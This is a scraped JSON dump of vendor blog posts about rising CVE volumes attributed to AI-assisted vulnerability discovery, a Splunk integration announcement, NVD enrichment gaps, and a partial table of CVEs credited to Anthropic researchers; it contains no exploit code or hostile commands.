threat","https:\u002F\u002Fwww.thestack.technology\u002Fuk-regulators-sound-alarm-over-frontier-ai-threat\u002F","2026-05-18",[2962],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":2964,"toc":3227},[2965,2971,2974,2994,3003,3012,3021,3024,3028,3033,3036,3039,3043,3046,3050,3056,3059,3066,3070,3075,3078,3081,3102,3106,3111,3114,3117,3120,3126,3130,3135,3138,3141,3147,3150,3155,3158,3161,3167,3171,3174,3177,3180,3186,3190,3193,3195,3209,3213,3216,3218,3220,3222],[18,2966,2967],{},[68,2968],{"alt":2969,"src":2970},"CVE Growth","\u002Fblog\u002Fai-assisted-vulnerability-discovery\u002Ftop20_cnas_cumulative.png",[18,2972,2973],{},"Key Takeaways:",[22,2975,2976,2979,2982,2985,2988,2991],{},[25,2977,2978],{},"CVE disclosure volumes are up sharply year-to-date (YTD) across several software suppliers, including Chrome (+563.2%), VMware (+180.9%), Apache (+170.3%), Mozilla (+156.9%), HPE (+132.3%), and F5 (+113.8%).",[25,2980,2981],{},"GitHub CVE issuance is also up significantly YTD (+476.07%), with GitHub indicating the increase is spread across many reporters and projects rather than concentrated in one source.",[25,2983,2984],{},"The increases are consistent with broader use of AI-assisted vulnerability discovery, though the signal is still emerging and not all increases can be directly attributed to AI.",[25,2986,2987],{},"Public examples from Mozilla, Microsoft, Apache, Curl, and Palo Alto show AI models being used to find, validate, or triage vulnerabilities, with mixed results depending on the project.",[25,2989,2990],{},"What is less clear is whether these volumes will be sustained, or whether this is a temporary surge as frontier AI models are applied across different code bases.",[25,2992,2993],{},"Defenders should prepare for higher vulnerability volumes while continuing to use threat intelligence to prioritize emerging threats that are being actively exploited or likely to be.",[18,2995,2996,2997,3002],{},"Since the start of this year, I've been watching for evidence of AI-assisted vulnerability discovery in publicly disclosed CVE volumes. The early signals were noisy. Our \"",[47,2998,3001],{"href":2999,"rel":3000},"https:\u002F\u002Fwww.vulncheck.com\u002Fadvisories\u002Freport",[51],"report a vulnerability","\" service saw a flood of submissions that, frankly, started as slop. But over the past few months, the quality of incoming submissions has noticeably improved, and the underlying volume hasn't subsided.",[18,3004,3005,3006,3011],{},"Then on April 7, 2026, Anthropic announced ",[47,3007,3010],{"href":3008,"rel":3009},"https:\u002F\u002Fwww.anthropic.com\u002Fproject\u002Fglasswing",[51],"Project Glasswing"," and Claude Mythos Preview, and the conversation shifted hard. Anthropic claimed Mythos had already identified thousands of zero-day vulnerabilities across every major operating system and web browser. Rather than releasing the model publicly, they funneled access to a coalition of partners, including AWS, Apple, Broadcom, Cisco, CrowdStrike, Google, JPMorgan Chase, the Linux Foundation, Microsoft, NVIDIA, and Palo Alto Networks, plus several other organizations.",[18,3013,3014,3015,3020],{},"The cybersecurity industry's response was a mix of awe, fear, uncertainty, and doubt, which prompted two questions: At what scale is AI-assisted vulnerability discovery real? And at what scale would we see it in the public disclosure of vulnerabilities? Which led me to building a list tracking ",[47,3016,3019],{"href":3017,"rel":3018},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fanthropic-glasswing-cves",[51],"Anthropic attributed CVEs"," We are now two Patch Tuesdays past the Glasswing announcement, and the signals are starting to emerge.",[18,3022,3023],{},"To put the results in perspective, I started by looking at the top 20 CVE Numbering Authorities and their CVE issuance volume over the past five years and found clear indications across several projects of the likely impact AI-assisted vulnerability discovery is having on public disclosures of vulnerabilities.",[61,3025,3027],{"id":3026},"cve-issuance-trends-top-software-suppliers","CVE Issuance Trends - Top Software Suppliers",[18,3029,3030],{},[68,3031],{"alt":70,"src":3032},"\u002Fblog\u002Fai-assisted-vulnerability-discovery\u002F2026-cve-trends.png",[18,3034,3035],{},"Digging in a bit deeper, I decided to look at the top Software Suppliers and their year-over-year growth to better understand what significant changes might be happening. From the chart above we can see some notable increases across Chrome (+563.2%), Mozilla (+156.9%), VMware (+180.9%), Apache (+170.3%), HPE (+132.3%), F5 (+113.8%), among several others. In addition to these, GitHub's 476.07% increase highlights accelerated vulnerability disclosure across a high volume of open source projects.",[18,3037,3038],{},"The evidence appears to point to emerging AI models that have enabled software suppliers and security researchers to discover and remediate vulnerabilities that would have likely gone overlooked otherwise.",[61,3040,3042],{"id":3041},"digging-into-noteworthy-software-suppliers-and-open-source-projects","Digging Into Noteworthy Software Suppliers and Open Source Projects",[18,3044,3045],{},"To provide some visibility into the emerging trend of AI-assisted vulnerability discovery, we took a deeper look at several of the software suppliers and open source projects.",[993,3047,3049],{"id":3048},"github-open-source-project","GitHub (Open Source Project)",[18,3051,3052],{},[68,3053],{"alt":3054,"src":3055},"Github","\u002Fblog\u002Fai-assisted-vulnerability-discovery\u002Fgithub.png",[18,3057,3058],{},"During the same window in which our submission queue was experiencing its AI-driven surge, GitHub was seeing its own surge in vulnerability reports. Both the volume of findings and the corresponding increase in CVE issuance have been confirmed as real by the GitHub team.\n\"No single reporter accounts for more than ~3% of volume, and no single project accounts for more than ~7%. This isn't one person or one tool, it's a systemic shift in how vulnerability reporting is happening across the ecosystem.\" - Madison Oliver Ficorilli.\nSomething in the ecosystem has changed, and the most likely explanation is the greater availability of AI models that are effective at discovering vulnerabilities in open source software. It also highlights how open source software appears to serve as a testing ground for AI vulnerability discovery tools and an early indicator of what's to come.",[18,3060,3061,3062],{},"References: ",[47,3063,3064],{"href":3064,"rel":3065},"https:\u002F\u002Fwww.linkedin.com\u002Fpulse\u002Feveryones-blaming-ai-bad-vulnerability-reports-data-oliver-ficorilli-kvoxc\u002F?trackingId=miFeABHjId5tHsdVftUuaA%3D%3D",[51],[993,3067,3069],{"id":3068},"mozilla","Mozilla",[18,3071,3072],{},[68,3073],{"alt":3069,"src":3074},"\u002Fblog\u002Fai-assisted-vulnerability-discovery\u002Ffirefox.png",[18,3076,3077],{},"Mozilla has been one of the more vocal and transparent projects when it comes to AI-assisted vulnerability discovery, and is a participant in Project Glasswing. The Mozilla team stated, \"Since February, the Firefox team has been working around the clock using frontier AI models to find and fix latent security vulnerabilities in the browser.\" They also highlighted their participation in Anthropic's Mythos preview: \"As part of our continued collaboration with Anthropic, we had the opportunity to apply an early version of Claude Mythos Preview to Firefox.\"",[18,3079,3080],{},"References:",[22,3082,3083,3089,3095],{},[25,3084,3085],{},[47,3086,3087],{"href":3087,"rel":3088},"https:\u002F\u002Fblog.mozilla.org\u002Fen\u002Fprivacy-security\u002Fai-security-zero-day-vulnerabilities\u002F",[51],[25,3090,3091],{},[47,3092,3093],{"href":3093,"rel":3094},"https:\u002F\u002Fblog.mozilla.org\u002Fen\u002Ffirefox\u002Fhardening-firefox-anthropic-red-team\u002F",[51],[25,3096,3097],{},[47,3098,3101],{"href":3099,"rel":3100},"https:\u002F\u002Fhacks.mozilla.org\u002F2026\u002F05\u002Fbehind-the-scenes-hardening-firefox\u002F%3E",[51],"https:\u002F\u002Fhacks.mozilla.org\u002F2026\u002F05\u002Fbehind-the-scenes-hardening-firefox\u002F>",[993,3103,3105],{"id":3104},"chrome","Chrome",[18,3107,3108],{},[68,3109],{"alt":3105,"src":3110},"\u002Fblog\u002Fai-assisted-vulnerability-discovery\u002Fchrome.png",[18,3112,3113],{},"Chrome experienced a 563% increase in CVE disclosures, one of the most significant upticks we observed, and Google has confirmed its participation in Project Glasswing.",[18,3115,3116],{},"While we haven't seen concrete confirmation of what tools were used to drive the sudden increase, we suspect it's related to AI discovery tools, likely some combination of Mythos and Google's own AI models. The trend points toward AI-assisted discovery as the most likely driver.",[18,3118,3119],{},"Additionally, Google's Threat Intelligence Group recently published an article on adversaries leveraging AI for vulnerability exploitation, highlighting that the use of new tools isn't limited to the defender side.",[18,3121,3061,3122],{},[47,3123,3124],{"href":3124,"rel":3125},"https:\u002F\u002Fcloud.google.com\u002Fblog\u002Ftopics\u002Fthreat-intelligence\u002Fai-vulnerability-exploitation-initial-access",[51],[993,3127,3129],{"id":3128},"microsoft","Microsoft",[18,3131,3132],{},[68,3133],{"alt":3129,"src":3134},"\u002Fblog\u002Fai-assisted-vulnerability-discovery\u002Fmicrosoft.png",[18,3136,3137],{},"Microsoft is a participant in Project Glasswing and has also announced the launch of its own AI discovery tool, clear evidence that AI is making an impact on CVE disclosures. As Microsoft noted, \"The findings in this Patch Tuesday and the retrospective recall on five years of CLFS MSRC cases are evidence that AI vulnerability findings can scale.\"",[18,3139,3140],{},"This suggests we're likely just at the beginning of higher volumes of CVE disclosures across Microsoft products. It will be interesting to see how far Microsoft's CVE issuance scales over the coming months.",[18,3142,3061,3143],{},[47,3144,3145],{"href":3145,"rel":3146},"https:\u002F\u002Fwww.microsoft.com\u002Fen-us\u002Fsecurity\u002Fblog\u002F2026\u002F05\u002F12\u002Fdefense-at-ai-speed-microsofts-new-multi-model-agentic-security-system-tops-leading-industry-benchmark\u002F",[51],[993,3148,3149],{"id":1865},"Apache",[18,3151,3152],{},[68,3153],{"alt":3149,"src":3154},"\u002Fblog\u002Fai-assisted-vulnerability-discovery\u002Fapache.png",[18,3156,3157],{},"Apache is a participant in Project Glasswing and is experiencing a 170%+ increase in CVEs published. As Anthropic stated, \"we've donated $1.5M to the Apache Software Foundation to enable the maintainers of open-source software to respond to this changing landscape.\"\nWe thought it would be worthwhile to provide some examples of security researchers using AI tools to assist in their discovery work.\nActiveMQ CVE-2026-34197 was discovered by Naveen Sunkavally with the assistance of Claude and is now known to be exploited in the wild and recently landed on CISA KEV.",[18,3159,3160],{},"In his words:\n\"These days I always use Claude to take a first pass at source code for vulnerability hunting. I prompt it lightly and set up a target on the network for it to validate findings. A lot of the time, Claude finds interesting stuff but it doesn't quite rise to the level of a CVE I'd bother reporting. In this case, it did a great job, with nothing more than a couple of basic prompts. This was 80% Claude with 20% gift-wrapping by a human.\" - Naveen Sunkavally.",[18,3162,3061,3163],{},[47,3164,3165],{"href":3165,"rel":3166},"https:\u002F\u002Fhorizon3.ai\u002Fattack-research\u002Fdisclosures\u002Fcve-2026-34197-activemq-rce-jolokia\u002F",[51],[61,3168,3170],{"id":3169},"other-observations-in-ai-assisted-vulnerability-discovery","Other Observations in AI-Assisted Vulnerability Discovery",[993,3172,3173],{"id":1557},"Curl",[18,3175,3176],{},"While Curl didn't make our chart for CVE growth (we excluded lower-volume CVE software suppliers), it remains one of the most heavily audited and fuzzed code bases in existence.",[18,3178,3179],{},"Daniel Stenberg, who maintains Curl, offers a grounded perspective: of the five \"confirmed\" vulnerabilities Mythos initially reported, only one held up as a valid CVE after his security team's review, with the rest being false positives or non-security bugs. He also emphasizes that running multiple AI models over time continues to uncover different bugs and vulnerabilities, and notes that previous AI tools have already driven hundreds of bugfixes in curl. Daniel's blog is well worth the read.",[18,3181,3061,3182],{},[47,3183,3184],{"href":3184,"rel":3185},"https:\u002F\u002Fdaniel.haxx.se\u002Fblog\u002F2026\u002F05\u002F11\u002Fmythos-finds-a-curl-vulnerability\u002F",[51],[993,3187,3189],{"id":3188},"palo-alto","Palo Alto",[18,3191,3192],{},"While Palo Alto didn't make the charts due to lower overall CVE issuance, they've seen a 37% increase in CVE issuance year to date and have been very vocal recently about their use of frontier models.\n\"For over a month, we've been using the latest frontier AI models, including Anthropic's Mythos and Claude Opus 4.7 and OpenAI's GPT-5.5-Cyber as part of the Trusted Access for Cyber program. Our teams have worked tirelessly to learn how to fully leverage the immense power of these models, and to find and fix any vulnerabilities as quickly as possible.\" - Rich Campagna, SVP Palo Alto Networks.",[18,3194,3080],{},[22,3196,3197,3203],{},[25,3198,3199],{},[47,3200,3201],{"href":3201,"rel":3202},"https:\u002F\u002Fwww.paloaltonetworks.com\u002Fblog\u002F2026\u002F05\u002Fdefenders-guide-frontier-ai-impact-cybersecurity-may-2026-update\u002F",[51],[25,3204,3205],{},[47,3206,3207],{"href":3207,"rel":3208},"https:\u002F\u002Fwww.linkedin.com\u002Ffeed\u002Fupdate\u002Furn:li:activity:7460374274588061696\u002F?utm_source=share&utm_medium=member_desktop&rcm=ACoAAADShEQBPA7bU2zaIIHMTqDWMnEOq7PYu7g",[51],[61,3210,3212],{"id":3211},"a-bit-of-a-reality-check-for-defenders","A Bit of a Reality Check for Defenders",[18,3214,3215],{},"Vulnerability volumes are clearly trending up, with a short-term spike in public disclosures tied to AI-assisted discovery. What's less clear is whether these volumes will be sustained, or whether this is a temporary surge as better AI models are pointed at different code bases and new models continue to surface vulnerabilities.\nMost defenders are starting to see the initial impact of AI-assisted vulnerabilities in their backlogs and should plan for sustained volumes over time. That reinforces the importance of patching early and often, updating to the latest version when possible, and using threat intelligence to prioritize emerging threats that are being actively exploited or likely to be.",[61,3217,202],{"id":201},[18,3219,205],{},[18,3221,208],{},[18,3223,211,3224,217],{},[47,3225,216],{"href":214,"rel":3226},[51],{"title":219,"searchDepth":220,"depth":220,"links":3228},[3229,3230,3237,3241,3242],{"id":3026,"depth":220,"text":3027},{"id":3041,"depth":220,"text":3042,"children":3231},[3232,3233,3234,3235,3236],{"id":3048,"depth":1266,"text":3049},{"id":3068,"depth":1266,"text":3069},{"id":3104,"depth":1266,"text":3105},{"id":3128,"depth":1266,"text":3129},{"id":1865,"depth":1266,"text":3149},{"id":3169,"depth":220,"text":3170,"children":3238},[3239,3240],{"id":1557,"depth":1266,"text":3173},{"id":3188,"depth":1266,"text":3189},{"id":3211,"depth":220,"text":3212},{"id":201,"depth":220,"text":202},"2026-05-14",{"slug":3245},"ai-assisted-vulnerability-discovery","\u002Fblog\u002Fai-assisted-vulnerability-discovery",{"title":1225,"description":233},"blog\u002Fai-assisted-vulnerability-discovery",[242,243],"7S42f6Fund_DgiFL3z5yfMnamwsTuys4oNqSOc6_GoQ",{"id":3252,"title":3253,"articles":7,"authors":3254,"body":3260,"date":3349,"description":3350,"extension":234,"image":3351,"link":7,"meta":3352,"navigation":237,"path":3353,"seo":3354,"series":7,"stem":3357,"subtype":7,"tags":3358,"__hash__":3360},"blog\u002Fblog\u002Fvulncheck-exploit-intelligence-app-in-splunkbase.md","Learn How to Operationalize Exploit Intelligence in Splunk with VulnCheck’s New Splunkbase App",[3255],{"name":3256,"avatar":3257,"link":3258,"linkName":3259},"Kimber Duke","https:\u002F\u002Fca.slack-edge.com\u002FT02P16KHNRY-U07E4RTU9PA-fa22b26ad3c8-512","https:\u002F\u002Fwww.linkedin.com\u002Fin\u002Fkimberduke\u002F","Kimber on LinkedIn",{"type":15,"value":3261,"toc":3344},[3262,3265,3268,3272,3275,3278,3316,3320,3323,3326,3330,3337],[18,3263,3264],{},"We’re excited to announce that the VulnCheck Exploit Intelligence App is now available in the Splunkbase Marketplace. This new integration brings real-world exploit and vulnerability intelligence directly into Splunk, making it easier for security teams to enrich CVE data, prioritize remediation and respond faster to emerging threats.",[18,3266,3267],{},"For teams already using Splunk to centralize investigation and response, this integration is a meaningful step forward in supporting the entire exploitation lifecycle. Static CVSS scores and basic vulnerability metadata do not provide defenders with the necessary context to act quickly. This includes whether a vulnerability is tied to active exploitation, associated with known threat activity or relevant to software running in their environment. The result is too much time spent sorting noise and not enough time focusing on the issues that matter most.",[61,3269,3271],{"id":3270},"what-vulncheck-brings-to-splunk","What VulnCheck Brings to Splunk",[18,3273,3274],{},"By integrating VulnCheck’s APIs directly into Splunk, security teams gain inventory or SBOM-driven risk analytics, threat actor correlation and enriched vulnerability insights within the workflows they already rely on. This means faster analysis, improved prioritization and more informed remediation decisions based on actual risk instead of theoretical severity alone.",[18,3276,3277],{},"The VulnCheck Exploit Intelligence App enables Splunk users to operationalize these insights at scale through:",[22,3279,3280,3286,3292,3298,3304,3310],{},[25,3281,3282,3285],{},[295,3283,3284],{},"CVE Enrichment Engine"," for deeper CVE enrichment with VulnCheck exploitation intelligence",[25,3287,3288,3291],{},[295,3289,3290],{},"SBOM Risk Analysis"," for uploading and analyzing SPDX or CycloneDX SBOM files",[25,3293,3294,3297],{},[295,3295,3296],{},"Interactive Dashboards"," including executive overviews, CVE exploration, SBOM risk analysis and reporting",[25,3299,3300,3303],{},[295,3301,3302],{},"Custom Visualizations"," such as vulnerability priority pyramids, exploitation timelines and threat intelligence displays",[25,3305,3306,3309],{},[295,3307,3308],{},"Notable Event Integration"," for automatic enrichment of Splunk ES notable events with CVE intelligence",[25,3311,3312,3315],{},[295,3313,3314],{},"Adaptive Response Actions"," that enrich IP addresses and CVEs from notable events with VulnCheck intelligence data",[61,3317,3319],{"id":3318},"the-impact","The Impact",[18,3321,3322],{},"The VulnCheck Exploit Intelligence App allows security teams to bring real-world exploit context directly into their daily operations and spend less time pivoting across tools and more time acting on the vulnerabilities that represent real exposure. This ability to speed remediation matters even more at scale.",[18,3324,3325],{},"VulnCheck collects data from nearly 600 sources and more than 500 million records across all CVEs and vulnerabilities without a CVE. These data sources are curated and delivered in machine-readable formats, giving security teams the most relevant intelligence they can act on quickly in the systems they already depend on.",[61,3327,3329],{"id":3328},"get-started-on-splunkbase-today","Get Started on Splunkbase Today",[18,3331,3332,3333,59],{},"The VulnCheck Exploit Intelligence App is available now in the Splunkbase Marketplace. For organizations using Splunk to investigate threats, manage exposures, and drive response, the app makes it easier to bring exploit-aware vulnerability intelligence directly into existing security workflows. To download, please visit: ",[47,3334,3335],{"href":3335,"rel":3336},"https:\u002F\u002Fsplunkbase.splunk.com\u002Fapp\u002F8225",[51],[18,3338,3339,3340],{},"For documentation on integrating VulnCheck intelligence into Splunk please visit: ",[47,3341,3342],{"href":3342,"rel":3343},"https:\u002F\u002Fdocs.vulncheck.com\u002Fintegrations\u002Fsplunk",[51],{"title":219,"searchDepth":220,"depth":220,"links":3345},[3346,3347,3348],{"id":3270,"depth":220,"text":3271},{"id":3318,"depth":220,"text":3319},{"id":3328,"depth":220,"text":3329},"2026-04-20T09:00:00-05:00","Bring real-world exploit and vulnerability intelligence directly into Splunk, making it easier for security teams to enrich CVE data, prioritize remediation and respond faster to emerging threats.","\u002Fblog\u002Fvc-splunkbase-1200x630.png",{},"\u002Fblog\u002Fvulncheck-exploit-intelligence-app-in-splunkbase",{"title":3355,"description":3356},"VulnCheck Insights: CVE Context at the Hover of Your Cursor","Instead of bouncing between tabs, you now get instant, current context the moment a CVE appears on your screen.","blog\u002Fvulncheck-exploit-intelligence-app-in-splunkbase",[3359],"Integrations","TgT0BFsyyuTkuEbYiVmSmP4JApL_OEp2alRM39l7bpw",{"id":3362,"title":3363,"articles":7,"authors":3364,"body":3366,"date":3465,"description":3466,"extension":234,"image":7,"link":7,"meta":3467,"navigation":237,"path":3469,"seo":3470,"series":7,"stem":3471,"subtype":7,"tags":3472,"__hash__":3474},"blog\u002Fblog\u002Fexpanding-vulnerability-enrichment.md","VulnCheck’s Commitment to Expanding Access to Vulnerability Enrichment",[3365],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":3367,"toc":3459},[3368,3374,3377,3380,3391,3394,3397,3401,3404,3415,3418,3421,3428,3432,3435,3441,3445,3448,3450,3452,3454],[18,3369,3370],{},[68,3371],{"alt":3372,"src":3373},"VulnCheck Serving Everyone","\u002Fblog\u002Fexpanding-vulnerability-enrichment\u002Fvulncheck-nist.png",[18,3375,3376],{},"We've heard concerns about National Institute of Standards and Technology (NIST) NVD's announcement this week clarifying their focus will now be much more limited moving forward.",[18,3378,3379],{},"Starting on April 15, 2026, NIST will prioritize the following CVEs for enrichment:",[22,3381,3382,3385,3388],{},[25,3383,3384],{},"CVEs appearing in CISA’s Known Exploited Vulnerabilities (KEV) Catalog",[25,3386,3387],{},"CVEs for software used within the US federal government",[25,3389,3390],{},"CVEs for critical software as defined by Executive Order 14028",[18,3392,3393],{},"What this means is that there will be a significant volume of CVEs that will not be enriched by NIST. This news comes after over 2-years of degradation in the NIST NVD enrichment services that started in 2024 after a reduction in funding.",[18,3395,3396],{},"While we appreciate NIST’s transparency for communicating how they will be prioritizing and resourcing enrichment moving forward, this will continue to exacerbate the data gap that NIST NVD has left across CVE records impacting CPE, CWE and CVSS coverage over the past 2-years, which creates negative security outcomes for organizations in the United States and globally",[61,3398,3400],{"id":3399},"vulnchecks-commitment-to-the-community","VulnCheck's Commitment to The Community",[18,3402,3403],{},"In response to NIST NVD’s resource constraints in 2024, VulnCheck launched NVD++ on March 13, 2024, a free Community-accessible service providing:",[22,3405,3406,3409,3412],{},[25,3407,3408],{},"Timely access to NIST NVD data (no 503 Service Unavailables)",[25,3410,3411],{},"NIST NVD 1.0 compliant downloads (no longer supported by NIST)",[25,3413,3414],{},"Substantially expanded CPE coverage",[18,3416,3417],{},"Additionally, VulnCheck’s Exploit & Vulnerability Intelligence commercially-available product, already provides broad coverage for CVSS, CVSS-BT, & CPE lookup. One of the measures we took proactively in the past was to add CVSS scores from several vendor advisories to provide near complete coverage in our commercial offering.",[18,3419,3420],{},"1000’s of organizations have already adopted VulnCheck NVD++ since we have launched the service in addition to our other community offerings including VulnCheck KEV, VulnCheck XDB, and Report a Vulnerability Service.",[18,3422,3423,3424],{},"Anyone can access VulnCheck NVD++ as part of VulnCheck Community for free today at: ",[47,3425,3426],{"href":3426,"rel":3427},"https:\u002F\u002Fwww.vulncheck.com\u002Fnvd2",[51],[61,3429,3431],{"id":3430},"vulncheck-automated-cpe-generation","VulnCheck Automated CPE Generation",[18,3433,3434],{},"VulnCheck continues to outperform NIST NVD CPE enrichment in both volume of CVEs and speed. This chart provides VulnCheck CPE generation vs. NIST NVD over the past year. We remain committed to continuing to expand coverage.",[18,3436,3437],{},[68,3438],{"alt":3439,"src":3440},"VulnCheck CPE vs. NIST NVD","\u002Fblog\u002Fexpanding-vulnerability-enrichment\u002Fvulncheck-cpe.png",[61,3442,3444],{"id":3443},"expanding-nvd-enrichment-moving-forward","Expanding NVD++ Enrichment Moving Forward",[18,3446,3447],{},"VulnCheck will expand our NVD++ community and commercial enrichments over the next month to add CVSS scores to CVE records to provide timely and near complete CVSS coverage.",[61,3449,202],{"id":201},[18,3451,205],{},[18,3453,208],{},[18,3455,211,3456,217],{},[47,3457,216],{"href":214,"rel":3458},[51],{"title":219,"searchDepth":220,"depth":220,"links":3460},[3461,3462,3463,3464],{"id":3399,"depth":220,"text":3400},{"id":3430,"depth":220,"text":3431},{"id":3443,"depth":220,"text":3444},{"id":201,"depth":220,"text":202},"2026-04-16T10:00:00-05:00","In response to NIST NVD's announcement that it will significantly limit CVE enrichment starting April 15, 2026, VulnCheck reaffirms its commitment to filling the data gap through its free NVD++ community service and plans to expand coverage with CVSS scores over the next month",{"slug":3468},"expanding-vulnerability-enrichment","\u002Fblog\u002Fexpanding-vulnerability-enrichment",{"title":3363,"description":3466},"blog\u002Fexpanding-vulnerability-enrichment",[242,3473],"nist-nvd","8cA4uhkARDZHCuGktrt-I7sRkQyskN5ZAowKo_6oFWU",{"id":3476,"title":3477,"articles":3478,"authors":3511,"body":3513,"date":4396,"description":4397,"extension":234,"image":7,"link":7,"meta":4398,"navigation":237,"path":4400,"seo":4401,"series":7,"stem":4402,"subtype":7,"tags":4403,"__hash__":4404},"blog\u002Fblog\u002Fanthropic-glasswing-cves.md","Tracking CVEs Attributed to Anthropic Researchers and Project Glasswing",[3479,3484,3489,3493,3498,3503,3506],{"title":3480,"source":3481,"link":3482,"date":3483},"Nobody knows how many CVEs Anthropic's Project Glasswing has actually found","The Register","https:\u002F\u002Fwww.theregister.com\u002F2026\u002F04\u002F15\u002Fproject_glasswing_cves\u002F","2026-04-15",{"title":3485,"source":3486,"link":3487,"date":3488},"Behind the Mythos hype, Glasswing has just one confirmed CVE","CSO","https:\u002F\u002Fwww.csoonline.com\u002Farticle\u002F4159617\u002Fbehind-the-mythos-hype-glasswing-has-just-one-confirmed-cve.html","2026-04-16",{"title":3490,"source":3491,"link":3492,"date":3488},"“Developers are not engineers:” Why Anthropic’s Mythos and other AI tools expose gaps in vulnerability reporting","Cybernews","https:\u002F\u002Fcybernews.com\u002Fai-news\u002Fanthropic-mythos-ai-vulnerability-reporting-cve-disclosure\u002F",{"title":3494,"source":3495,"link":3496,"date":3497},"Risky Biz Newsletter","Risky Biz","https:\u002F\u002Fnews.risky.biz\u002Frisky-bulletin-nist-gives-up-enriching-most-cves\u002F","2026-04-17",{"title":3499,"source":3500,"link":3501,"date":3502},"A tsunami of flaws: When frontier AI and Patch Tuesday collide","ComputerWeekly","https:\u002F\u002Fwww.computerweekly.com\u002Fnews\u002F366641789\u002FA-tsunami-of-flaws-When-frontier-AI-and-Patch-Tuesday-collide","2026-04-22",{"title":3504,"source":3481,"link":3505,"date":3502},"Anthropic's super-scary bug hunting model Mythos is shaping up to be a nothingburger","https:\u002F\u002Fwww.theregister.com\u002F2026\u002F04\u002F22\u002Fanthropic_mythos_hype_nothingburger\u002F",{"title":3507,"source":3508,"link":3509,"date":3510},"Resilient Cyber Newsletter #94","Resilient Cyber","https:\u002F\u002Fwww.resilientcyber.io\u002Fp\u002Fresilient-cyber-newsletter-94","2026-04-24",[3512],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":3514,"toc":4387},[3515,3518,3521,3535,3538,3542,3557,3561,3564,3567,3570,3573,3651,3655,3661,4310,4313,4350,4354,4357,4360,4363,4369,4373,4376,4378,4380,4382],[18,3516,3517],{},"Anthropic's Project Glasswing has generated significant attention—but very little concrete data. One question keeps coming up: what exactly did it find, disclose, and receive CVEs for? We've fielded this question repeatedly, so I did the work of tracking down publicly disclosed CVEs credited to the Anthropic research team at this time.",[61,3519,20],{"id":3520},"key-takeaways",[22,3522,3523,3526,3529,3532],{},[25,3524,3525],{},"75 CVEs mention “Anthropic”",[25,3527,3528],{},"40 are actually credited to Anthropic researchers",[25,3530,3531],{},"Only 1 is explicitly attributed to Glasswing",[25,3533,3534],{},"10 are from external collaboration programs (Calif.io \u002F MADBugs)",[18,3536,3537],{},"Taken together, this suggests that while Anthropic researchers are actively contributing to vulnerability discovery and appears to be promising, the publicly attributable impact of Glasswing itself remains limited so far.",[61,3539,3541],{"id":3540},"methodology","Methodology",[18,3543,3544,3545,3550,3551,3556],{},"I started by re-reading the ",[47,3546,3549],{"href":3547,"rel":3548},"https:\u002F\u002Fwww.anthropic.com\u002Fglasswing",[51],"Glasswing report"," and the advisories published at ",[47,3552,3555],{"href":3553,"rel":3554},"https:\u002F\u002Fred.anthropic.com\u002F",[51],"red.anthropic.com",". Neither source provides a comprehensive CVE list of vulnerabilities discovered by Anthropic. So I decided to search the full CVE record database, and searched every CVE record containing the term \"anthropic\" and reviewed each one.",[61,3558,3560],{"id":3559},"what-disclosed-vulnerabilities-have-been-credited-to-the-anthropic-research-team","What Disclosed Vulnerabilities Have Been Credited to the Anthropic Research Team?",[18,3562,3563],{},"75 CVE records contain the term \"Anthropic.\" Of those, 40 are credited to Anthropic or Anthropic-affiliated researchers in the credits field. The remaining 35 are CVEs affecting Anthropic tools like Claude Code, MCP Inspector, and third party integrations which are out of scope for this analysis..",[18,3565,3566],{},"Searching the credits field for \"Anthropic\" is one way to explore this question today, though the credits vary. The 40 break down across three distinct credit attributions: the core Anthropic research team, Nicholas Carlini individually, and Calif.io, an independent security research firm running a program called MADBugs (Month of AI-Discovered Bugs) that credits their work jointly as \"Calif.io in collaboration with Claude and Anthropic Research.\" The 9 wolfSSL CVEs and the NGINX CVE all fall into that third category.",[18,3568,3569],{},"CVE credits are not standardized and depend on how individual CNAs populate the field, meaning attribution is incomplete and sometimes inconsistent.",[18,3571,3572],{},"Here is the breakdown by vendor:",[307,3574,3575,3588],{},[310,3576,3577],{},[313,3578,3579,3582,3585],{},[316,3580,3581],{},"Vendor",[316,3583,3584],{},"Product",[316,3586,3587],{},"# of CVEs",[336,3589,3590,3600,3609,3619,3628,3637],{},[313,3591,3592,3594,3597],{},[341,3593,3069],{},[341,3595,3596],{},"Firefox",[341,3598,3599],{},"28",[313,3601,3602,3605,3607],{},[341,3603,3604],{},"wolfSSL",[341,3606,3604],{},[341,3608,723],{},[313,3610,3611,3614,3617],{},[341,3612,3613],{},"F5",[341,3615,3616],{},"NGINX Plus",[341,3618,467],{},[313,3620,3621,3624,3626],{},[341,3622,3623],{},"FreeBSD",[341,3625,3623],{},[341,3627,467],{},[313,3629,3630,3633,3635],{},[341,3631,3632],{},"OpenSSL",[341,3634,3632],{},[341,3636,467],{},[313,3638,3639,3644,3646],{},[341,3640,3641],{},[295,3642,3643],{},"Total",[341,3645],{},[341,3647,3648],{},[295,3649,3650],{},"40",[61,3652,3654],{"id":3653},"the-list-of-40-cves-attributed-to-anthropic","The List of 40 CVEs Attributed to Anthropic",[18,3656,3657,3658],{},"The Latest Updated List is Here: ",[47,3659,49],{"href":49,"rel":3660},[51],[307,3662,3663,3683],{},[310,3664,3665],{},[313,3666,3667,3670,3673,3675,3677,3680],{},[316,3668,3669],{},"CVE Number",[316,3671,3672],{},"Date Published",[316,3674,3581],{},[316,3676,3584],{},[316,3678,3679],{},"CVSS",[316,3681,3682],{},"Credit",[336,3684,3685,3703,3718,3733,3748,3764,3779,3794,3809,3824,3839,3854,3869,3884,3899,3914,3929,3944,3959,3974,3989,4005,4020,4036,4052,4067,4083,4098,4114,4131,4148,4165,4183,4199,4215,4231,4248,4263,4278,4294],{},[313,3686,3687,3690,3693,3695,3697,3700],{},[341,3688,3689],{},"CVE-2026-2763",[341,3691,3692],{},"2026-02-24",[341,3694,3069],{},[341,3696,3596],{},[341,3698,3699],{},"9.8",[341,3701,3702],{},"Evyatar Ben Asher, Keane Lucas, Nicholas Carlini, Newton Cheng, Daniel Freeman, Alex Gaynor, and Joel Weinberger using Claude from 